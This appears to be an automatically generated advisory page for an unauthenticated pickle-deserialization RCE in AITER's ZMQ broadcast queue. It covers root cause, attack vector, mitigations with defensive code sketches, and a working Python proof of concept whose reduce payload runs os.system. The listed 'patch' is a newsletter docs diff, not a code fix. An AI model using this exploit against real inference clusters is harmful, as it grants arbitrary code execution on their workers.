VYPR
High severity · 8.1 · NVD Advisory · Published Jun 1, 2026

CVE-2026-49121

Description

AI Tensor Engine for ROCm (AITER) through 0.1.14 contains an unauthenticated remote code execution vulnerability in the MessageQueue.recv() function within shm_broadcast.py that allows unauthenticated remote attackers to execute arbitrary code by sending a malicious pickle payload to a ZMQ SUB socket with no authentication, HMAC, or format validation. Attackers who can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr can deliver a crafted pickle payload that executes arbitrary code simultaneously as the inference worker process on every remote reader worker.

Affected products

1

Patches

1
8d47409af7ec

docs: add AITER May 2026 newsletter (#3170)

https://github.com/ROCm/aiter · Peng · May 14, 2026 · via nvd-ref
1 file changed · +170 -0
  • docs/newsletter/2026-05.md · +170 -0 · added
    @@ -0,0 +1,170 @@
    +# AITER Newsletter — May 2026
    +
    +**Period covered:** April 14 – May 13, 2026
    +
    +[AITER](https://github.com/ROCm/aiter) is AMD's open-source AI Tensor Engine for ROCm: a kernel and primitive library for inference and training acceleration on Instinct GPUs (MI300X, MI308, MI325X, MI355X) and Radeon RDNA4/RDNA5. AITER is consumed downstream by vLLM, SGLang, ATOM, and PyTorch ROCm.
    +
    +This is the first issue of a monthly newsletter. Goal: keep our partners current on what's landed in `main`, what's been released, and what's coming. Feedback welcome via [GitHub Issues](https://github.com/ROCm/aiter/issues).
    +
    +## TL;DR
    +
    +- **221 commits** to `main`, **37 contributors**, ~50 commits/week steady-state.
    +- **2 official releases shipped:** v0.1.12.post2 (Apr 23) and v0.1.13 (May 9). v0.1.14 in RC.
    +- **DeepSeek-V4 enablement** is the dominant cross-cutting theme: fused kernels, tuned configs, A8W4 MoE, MLA improvements landing in waves.
    +- **MoE kernel family expanded:** new int4 path for Kimi-K2.5, A8W4 for DSv4, MXFP4 alignment, swiglu A4W4 for GPT-OSS, ASM fmoe for gfx950.
    +- **Architecture footprint widened:** gfx950 (MI355X) maturing in production, gfx1201 (RDNA4) FlashAttention backend landed, gfx1250 (MI450) early enablement via FlyDSL 0.1.7.
    +- **Release engineering tightened:** 6-wheel manylinux_2_28 matrix per release with strict torch ABI pinning.
    +
    +## How to Use AITER
    +
    +Public manylinux wheels are published with each release for ROCm 7.0 / 7.1 / 7.2 × Python 3.10 / 3.12, fat-binary across `gfx942` (MI300/MI308/MI325X) and `gfx950` (MI355X):
    +
    +```bash
    +pip install aiter --extra-index-url https://download.pytorch.org/whl/rocm7.2
    +```
    +
    +Or download release artifacts directly: [github.com/ROCm/aiter/releases](https://github.com/ROCm/aiter/releases).
    +
    +Build from source: see [BUILD.md](https://github.com/ROCm/aiter/blob/main/BUILD.md). Submodule init is required (`git submodule update --init --recursive`).
    +
    +## Releases Shipped This Period
    +
    +| Version | Date | Highlights |
    +|---|---|---|
    +| v0.1.12.post2 | 2026-04-23 | Critical CK MoE multi-arch dispatch fix (#2645), workflow `torch_pin` support (#2875) |
    +| v0.1.13-rc1 → rc5 | 2026-04-25 → 2026-05-08 | Five RC iterations covering preshuffle layouts, MLA fixes, ASM fmoe kernels |
    +| v0.1.13 | 2026-05-09 | Production release. New ASM fmoe kernels for gfx950 (off by default, opt-in via `AITER_XBFLOAT16=1`) |
    +
    +## Highlights by Area
    +
    +### DeepSeek-V4 Enablement
    +
    +DSv4 is now the largest cross-cutting workstream in AITER. Coverage spans Triton, ATOM integration, FlyDSL kernels, and tuned GEMM/FMoE configs.
    +
    +- **DSV4 fusions phase 1** ([#3057](https://github.com/ROCm/aiter/pull/3057)): `fused_reduce_q_norm_qk_rope_swa_write` and `fused_clamp_act_mul_quant`, integrated end-to-end in ATOM.
    +- **DSv4-Pro BF16 tuned GEMM** ([#3113](https://github.com/ROCm/aiter/pull/3113)): no-hipblaslt path.
    +- **DSv4-Pro A8W8 blockscale tuned configs** ([#3108](https://github.com/ROCm/aiter/pull/3108)).
    +- **A8W4 MoE FlyDSL path for DSv4** ([#2951](https://github.com/ROCm/aiter/pull/2951)).
    +- **Fused rope + rotate_activation + fp4_quant_inplace** ([#3035](https://github.com/ROCm/aiter/pull/3035)): single-pass DSv4 prologue.
    +- **Bulk merge of tuned configs** ([#3004](https://github.com/ROCm/aiter/pull/3004) + [#3024](https://github.com/ROCm/aiter/pull/3024)): GLM-4.7, Kimi-K2.5, MiniMax-M2.5, DeepSeek-V3.2 GEMM and FMoE.
    +
    +### MoE Kernel Family
    +
    +Significant diversification of MoE precision and quantization paths.
    +
    +- **Kimi-K2.5 a16wi4 MoE** ([#2863](https://github.com/ROCm/aiter/pull/2863)): bf16 activations × packed int4 weights with per-1×32 bf16 groupwise scale. New FlyDSL `int4_bf16` stage1/stage2 kernels and fused `swiglu_and_mul`.
    +- **MXFP4 fused quant path alignment** ([#3123](https://github.com/ROCm/aiter/pull/3123)): consistent semantics across A4W4 paths.
    +- **MXFP4 quantize kernel** ([#2976](https://github.com/ROCm/aiter/pull/2976)): standalone primitive for upstream quantization pipelines.
    +- **GPT-OSS swiglu A4W4 path** ([#2972](https://github.com/ROCm/aiter/pull/2972)): enables GPT-OSS on A4W4 hardware.
    +- **ASM fmoe kernels for gfx950** ([#2262](https://github.com/ROCm/aiter/pull/2262)): bypass bf16→fp8 quantization. Triple-gated behind `AITER_XBFLOAT16=1` env var, gfx950 only, `per_1×128` quant only. Opt-in for safety in this release line.
    +- **Top-k optimizations**: radix top-k for MI308/MI355X ([#3087](https://github.com/ROCm/aiter/pull/3087)), sigmoid/softmax `topk_gating` ([#3100](https://github.com/ROCm/aiter/pull/3100)), Triton fused topk ([#3096](https://github.com/ROCm/aiter/pull/3096)).
    +- **GPT-OSS MoE TP2/TP8 tuned configs** ([#3140](https://github.com/ROCm/aiter/pull/3140)).
    +
    +### MLA / Multi-head Latent Attention
    +
    +- **HK MLA: MI35X m16x8 retune + new m16x4 kernel + page_size + mask support** ([#3072](https://github.com/ROCm/aiter/pull/3072)).
    +- **MI350 MLA ps mode bf16**: `nhead64,1` routed to `m16x4`, no folding ([#3063](https://github.com/ROCm/aiter/pull/3063)).
    +- **gfx950 ASM PA non-persistent decode crash on `nhead=32` fixed** ([#2983](https://github.com/ROCm/aiter/pull/2983)).
    +- **FP8 MLA decode kernel for `sub_kv=64, sub_qh=8`** ([#3014](https://github.com/ROCm/aiter/pull/3014)): for `gqa_ratio=8, qseqlen=1` workloads.
    +
    +### FMHA / Attention
    +
    +- **F8 FMHA ASM gfx950** ([#2911](https://github.com/ROCm/aiter/pull/2911)): production-grade FMHA on MI355X.
    +- **`batch_prefill` OOB page table read fix with regression tests** ([#3032](https://github.com/ROCm/aiter/pull/3032)).
    +- **rope OOB under concurrent scenarios** ([#3078](https://github.com/ROCm/aiter/pull/3078)).
    +- **dsink bf16 noise in Triton MHA backward** ([#3070](https://github.com/ROCm/aiter/pull/3070)).
    +- **`fused_qk_rmsnorm_per_token_quant` kernel** ([#2958](https://github.com/ROCm/aiter/pull/2958)): new fused primitive.
    +- **Manifold-constrained Hyper Connection (mHC-pre)** ([#2646](https://github.com/ROCm/aiter/pull/2646)): research path enabled in Triton.
    +
    +### Architecture Expansion
    +
    +- **gfx950 (MI355X)** — maturing across MoE, MLA, and FMHA. Now the primary production target alongside gfx942.
    +- **gfx1201 (RDNA4)** — FlyDSL `flash_attn_func` backend landed in v0.1.13. First RDNA4-class attention backend in AITER.
    +- **gfx1250 (MI450)** — FlyDSL 0.1.7 adds early gfx1250 support ([#3121](https://github.com/ROCm/aiter/pull/3121)). Pre-silicon enablement track.
    +- **gfx942 (MI300/MI308/MI325X)** — continued tuning, e.g. dsv3 blockscale GEMM config in MI300 ([#2881](https://github.com/ROCm/aiter/pull/2881)).
    +
    +### FlyDSL
    +
    +FlyDSL is AITER's emerging in-house DSL for high-performance kernels, providing a path that complements Composable Kernel (CK).
    +
    +- Version progression: 0.1.4 → 0.1.5 → 0.1.6 → 0.1.7 over the period.
    +- **gfx1250 support** ([#3121](https://github.com/ROCm/aiter/pull/3121)).
    +- **GDR decode indexing fix** ([#3125](https://github.com/ROCm/aiter/pull/3125)).
    +- **`fly_values` import compatibility fix** ([#3141](https://github.com/ROCm/aiter/pull/3141)).
    +- New kernel families: int4 MoE, A8W4 MoE, `swiglu_and_mul`, MXScale FP8/A8W4 GEMM.
    +
    +### Notable Bug Fixes
    +
    +- **CK MoE multi-arch dispatch silent wrong-kernel** ([#2645](https://github.com/ROCm/aiter/pull/2645)) — shipped in v0.1.12.post2. Affected anyone with a multi-arch fat binary.
    +- **CK MoE split-k buffer dispatch** ([#3050](https://github.com/ROCm/aiter/pull/3050)) — wrong buffer size on identity vs equality compare.
    +- **Address overflow in tile dispatch** ([#3124](https://github.com/ROCm/aiter/pull/3124)).
    +- **`cp_gather_indexer_k_cache` indexing** ([#2954](https://github.com/ROCm/aiter/pull/2954)).
    +- **GLM-5 GEMM bf16 8192×2048 retune** ([#3101](https://github.com/ROCm/aiter/pull/3101)) — accuracy regression resolution.
    +
    +### Downstream Integrations
    +
    +- **vLLM v0.19.1**: torch ABI pinning matrix per ROCm version (7.0 → torch 2.10, 7.1 → torch 2.10, 7.2 → torch 2.11). Verified against MI355X.
    +- **SGLang AMD aiter CI branch** ([#3120](https://github.com/ROCm/aiter/pull/3120)): downstream SGLang now runs on a dedicated AMD aiter branch in CI for predictable integration.
    +- **ATOM 0.1.2.post**: tracks AITER releases. v0.1.13 validated against ATOM serving via lm-eval gsm8k 3-shot.
    +- **PyTorch wheels**: AITER wheels available on `download.pytorch.org/whl/rocm{7.0,7.1,7.2}` via PyTorch's manylinux2_28 builder images.
    +
    +### Release Engineering
    +
    +- **6-wheel matrix per release**: ROCm 7.0 / 7.1 / 7.2 × Python 3.10 / 3.12, manylinux_2_28 ABI, fat binary `gfx942;gfx950`.
    +- **Strict torch ABI pinning** via the `torch_pin` workflow input. Avoids the recurring `c10::cuda` undefined-symbol class of failures when wheels are mixed with mismatched torch builds.
    +- **CI prebuilt kernel reuse** ([#3143](https://github.com/ROCm/aiter/pull/3143)): cuts test wall time.
    +- **Auto-update split-test FILE_TIMES** ([#2918](https://github.com/ROCm/aiter/pull/2918)): keeps shard balance current.
    +- **Known issues now tracked in release notes** when material to consumers (e.g. [#3076](https://github.com/ROCm/aiter/issues/3076), [#3062](https://github.com/ROCm/aiter/issues/3062)).
    +
    +## Validation Reference
    +
    +GSM8K 3-shot, flexible-extract, MI355X, on ATOM serving:
    +
    +| Model | v0.1.13 Score | Threshold |
    +|---|---|---|
    +| DeepSeek-R1-0528 | 0.9454 | 0.94 |
    +| MiniMax-M2.5 | 0.9295 | 0.92 |
    +| Qwen3-235B-FP8 | 0.8802 | 0.87 |
    +
    +## What's Coming
    +
    +### v0.1.14 (target this week)
    +
    +- Cumulative changes since v0.1.13 (141 commits).
    +- DSv4 fusions phase 1 in baseline, plus DSv4-Pro tuned GEMM.
    +- HK MLA retune for MI35X.
    +- `batch_prefill` OOB fix.
    +- 6-wheel matrix shipped, accuracy validation gating.
    +
    +### v0.1.13.post1 (in next 1–2 days)
    +
    +- Adds Kimi-K2.5 a16wi4 MoE ([#2863](https://github.com/ROCm/aiter/pull/2863)) + splitk fix ([#3050](https://github.com/ROCm/aiter/pull/3050)) on top of v0.1.13, for partners needing the int4 MoE path on the v0.1.13 line.
    +
    +### Beyond v0.1.14
    +
    +- DSv4 fusions phase 2.
    +- MORI v1.2.0 first release.
    +- Continued gfx1250 enablement as silicon matures.
    +- Continued FlyDSL kernel coverage expansion.
    +
    +## Known Issues Carrying
    +
    +- **[#3076](https://github.com/ROCm/aiter/issues/3076)** — `aiter/dist/shm_broadcast.py` uses `pickle.loads` on a TCP-bound ZMQ XPUB. Pre-existing since v0.1.12. Mitigation: bind to loopback only or front the broadcast socket with a firewall.
    +- **[#3062](https://github.com/ROCm/aiter/issues/3062)** — gfx950 ASM paged-attention `block_id` truncates at the 16-bit / 65,536-block (~2 GB) boundary. Pre-existing. Mitigation: route pure-MHA layers to the Triton/Gluon paged-attention path.
    +
    +Both will be addressed in v0.1.14 or a follow-up post-release.
    +
    +## Get Involved
    +
    +- **Repo:** [github.com/ROCm/aiter](https://github.com/ROCm/aiter)
    +- **Releases & wheels:** [github.com/ROCm/aiter/releases](https://github.com/ROCm/aiter/releases)
    +- **File issues / requests:** [GitHub Issues](https://github.com/ROCm/aiter/issues). Tag with `[request]` prefix for kernel/config tune requests.
    +- **Pull requests welcome.** See [CONTRIBUTING.md](https://github.com/ROCm/aiter/blob/main/CONTRIBUTE.md) for how to land changes.
    +
    +## Contributor Acknowledgments
    +
    +37 unique contributors landed code in `main` over the past month. Top contributors by commit count: Xin Huang, yzhou103, Peng Sun, la, XiaobingZhang, Lingpeng Jin, Nidal Danial, amd-ruitang3, Sergey Solovyev, lalala-sh, Elton, Yutao Xu, Pleaplusone, JaxChen29, Felix Li, and many more. Thanks to everyone shipping kernels, fixes, and tuned configs.
    +
    +---
    +
    +*Newsletter compiled by the AMD AI Software Engineering team. Next issue: mid-June 2026.*
    

Vulnerability mechanics

Root cause

"The MessageQueue.recv() function deserializes untrusted data using pickle.loads() without proper validation."
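To make the root cause concrete, the following minimal sketch shows that `pickle.loads()` calls whatever callable the serialized bytes name. The `Benign` class and the use of `operator.add` are illustrative assumptions chosen to be harmless; they are not taken from AITER.

```python
import operator
import pickle


class Benign:
    """Stand-in for a crafted object; the callable used here is harmless."""

    def __reduce__(self):
        # pickle stores "call operator.add(40, 2)" as the recipe for
        # rebuilding this object. The receiver runs that call on load.
        return (operator.add, (40, 2))


frame = pickle.dumps(Benign())

# The receiver never sees a Benign instance: deserialization itself
# invokes the named callable and returns its result.
result = pickle.loads(frame)
print(type(result).__name__, result)
```

The sender alone decides which callable runs on the receiver, which is why unpickling bytes from an unauthenticated socket amounts to code execution.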

Attack vector

An unauthenticated attacker can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr. By sending a malicious pickle payload to a ZMQ SUB socket, the attacker can execute arbitrary code simultaneously as the inference worker process on every remote reader worker [ref_id=1]. This is possible because the socket has no authentication, HMAC, or format validation [ref_id=1].

Affected code

The vulnerability lies within the MessageQueue.recv() function in shm_broadcast.py, specifically at the line `return pickle.loads(recv.buffer)` [ref_id=1]. This function is called by MessageQueue.dequeue() when the reader is a remote reader, utilizing a SUB socket connected to the writer's XPUB socket which is bound to the host network [ref_id=1].
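As a rough illustration of what a data-only decode step in place of `pickle.loads(recv.buffer)` could look like, here is a sketch that uses the standard-library `json` module as a stand-in for the serializers the advisory names. The message schema (`kind`, `seq`, `payload`) and both function names are hypothetical and do not reflect AITER's actual wire format.

```python
import json

# Hypothetical control-message schema, assumed for illustration only.
ALLOWED_KEYS = {"kind", "seq", "payload"}


def encode_frame(kind: str, seq: int, payload) -> bytes:
    """Serialize a control message as UTF-8 JSON (data only, no callables)."""
    return json.dumps({"kind": kind, "seq": seq, "payload": payload}).encode("utf-8")


def decode_frame(buf: bytes) -> dict:
    """Parse a frame and reject anything that does not match the schema."""
    # Both UnicodeDecodeError and json.JSONDecodeError subclass ValueError,
    # so callers can catch a single exception type for malformed input.
    msg = json.loads(buf.decode("utf-8"))
    if not isinstance(msg, dict) or set(msg) != ALLOWED_KEYS:
        raise ValueError("unexpected frame shape")
    if not isinstance(msg["kind"], str) or not isinstance(msg["seq"], int):
        raise ValueError("unexpected field types")
    return msg
```

A JSON parser can only produce plain data such as dicts, lists, strings, and numbers, so a malformed or hostile frame results in a `ValueError` rather than a function call. Tensor buffers would need a separate binary path, which this sketch does not cover.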

What the fix does

The advisory suggests replacing pickle with a safer serializer like msgpack or safetensors for control-plane metadata and tensor buffers. Alternatively, if pickle must be retained, a per-frame HMAC-SHA256 tag derived from a shared cluster secret should be prepended, with frames failing verification rejected before deserialization. The advisory also recommends restricting the XPUB bind address to localhost for single-host deployments and requiring explicit opt-in for multi-host configurations with a warning [ref_id=1].
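The per-frame HMAC option described above can be sketched as follows. This is a minimal illustration under stated assumptions, not AITER's implementation: the function names `seal` and `open_frame` are hypothetical, and how the shared cluster secret is distributed is out of scope.

```python
import hashlib
import hmac
import pickle

TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag


def seal(secret: bytes, obj) -> bytes:
    """Writer side: prepend an HMAC-SHA256 tag to the pickled body."""
    body = pickle.dumps(obj)
    tag = hmac.new(secret, body, hashlib.sha256).digest()
    return tag + body


def open_frame(secret: bytes, frame: bytes):
    """Reader side: verify the tag first, deserialize only on success."""
    if len(frame) < TAG_LEN:
        raise ValueError("frame too short")
    tag, body = frame[:TAG_LEN], frame[TAG_LEN:]
    expected = hmac.new(secret, body, hashlib.sha256).digest()
    # compare_digest runs in constant time to avoid leaking tag bytes.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC verification failed")
    return pickle.loads(body)  # reached only for authenticated frames
```

The key property is ordering: `pickle.loads` is never called on bytes that fail verification. The sketch does not address replay of previously valid frames, which would need a sequence number or nonce inside the authenticated body.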

Preconditions

  • network: The attacker must be able to reach the writer XPUB endpoint on the cluster network.
  • input: Alternatively, the attacker must be able to supply a forged Handle with an attacker-controlled remote_subscribe_addr.
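The network precondition is what the advisory's bind-address recommendation targets. One way such a policy might look is sketched below: loopback by default, and a non-loopback address only with explicit opt-in plus a warning. The function name `choose_bind_host` and its `allow_multi_host` flag are hypothetical and are not part of AITER's API.

```python
import ipaddress
import warnings


def choose_bind_host(requested: str = "127.0.0.1", allow_multi_host: bool = False) -> str:
    """Return the host to bind the broadcast socket to, or refuse."""
    addr = ipaddress.ip_address(requested)  # raises ValueError on bad input
    if addr.is_loopback:
        return requested  # single-host deployments stay on loopback
    if not allow_multi_host:
        raise ValueError(
            f"refusing to bind to {requested}: pass allow_multi_host=True "
            "to expose the broadcast socket beyond loopback"
        )
    warnings.warn(
        f"broadcast socket will be reachable on {requested}; "
        "restrict access at the network layer",
        RuntimeWarning,
    )
    return requested
```

Defaulting to loopback removes network reachability for single-host runs, while the opt-in makes multi-host exposure a deliberate choice. It does not help against a forged Handle, which points the reader at an attacker's endpoint regardless of where the writer binds.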

Reproduction

```python
#!/usr/bin/env python3
import os, pickle, sys, threading, time
import zmq

PROOF_FILE = "/tmp/aiter-shm-pwned"
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../source_audit/aiter"))

from aiter.dist.shm_broadcast import MessageQueue, Handle


class RCEPayload:
    def __reduce__(self):
        return (os.system, (f"id > {PROOF_FILE} && hostname >> {PROOF_FILE}",))


def _victim(addr):
    time.sleep(0.3)
    handle = Handle(local_reader_ranks=[], remote_subscribe_addr=addr)
    mq = MessageQueue.create_from_handle(handle, rank=99)
    try:
        mq.dequeue(timeout=10.0)
    except Exception:
        pass


if __name__ == "__main__":
    if os.path.exists(PROOF_FILE):
        os.unlink(PROOF_FILE)

    ctx = zmq.Context()
    pub = ctx.socket(zmq.XPUB)
    port = pub.bind_to_random_port("tcp://127.0.0.1")

    t = threading.Thread(target=_victim, args=(f"tcp://127.0.0.1:{port}",), daemon=True)
    t.start()

    pub.setsockopt(zmq.RCVTIMEO, 3000)
    try:
        pub.recv()  # wait for SUB subscription from victim
    except zmq.Again:
        pass

    pub.send(pickle.dumps(RCEPayload()))

    t.join(timeout=10)
    pub.close()
    ctx.term()

    if os.path.exists(PROOF_FILE):
        print(f"[+] RCE confirmed: {open(PROOF_FILE).read().strip()}")
    else:
        print("[-] failed")
```
[ref_id=1]

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3
